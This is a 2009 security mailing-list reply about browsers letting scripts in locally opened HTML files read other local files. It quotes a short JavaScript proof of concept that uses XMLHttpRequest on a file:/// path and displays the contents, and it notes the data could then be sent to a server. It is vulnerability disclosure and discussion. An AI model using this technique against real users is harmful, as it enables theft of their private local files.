it's always been possible to steal local files if you can convince a user to open a "harmless" html file from their local filesystem. this is possible because the scripting code runs within local context (in FF terminology - not sure what Safari calls it). last time i checked [1] [2] FF didn't even issue a warning when opening a local file with scripting code in it, although i haven't checked in the case of Safari [1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/ [2] http://marc.info/?l=bugtraq&m=116386919506057&w=2 On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed@xxxxxxxxxxx> wrote: > > .html can be crafted to force a unaware user to read file from local, and then possibly send it to a server. > > var method = "GET" > var URL = "file:///C:/argentina/bsas_junin.txt" > xmlhttp.open( method, URL, true) > > This type of request is possible if file is on user local in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3) > > > if (xmlhttp != null) { > xmlhttp.open( method, URL, true) > xmlhttp.onreadystatechange=function(){ > if (xmlhttp.readyState==4) { > alert(URL + "\n\n" + xmlhttp.responseText) > } > } > } > > this is a valid operation javascript can read then xmlhttp.responseText, yes the file content. > > After this you can do whatever you want whit the file. > > note that you MUST know the file path!! > > crafted by: federico.lanusse > pantera_bleed@xxxxxxxxxxx > federico.lanusse@xxxxxxxxxxxx > > company: clarolab QA team > yeah! lets rock Ateam!! > > Chrome ISSUE, with attached POC. > http://code.google.com/p/chromium/issues/detail?id=13671 >
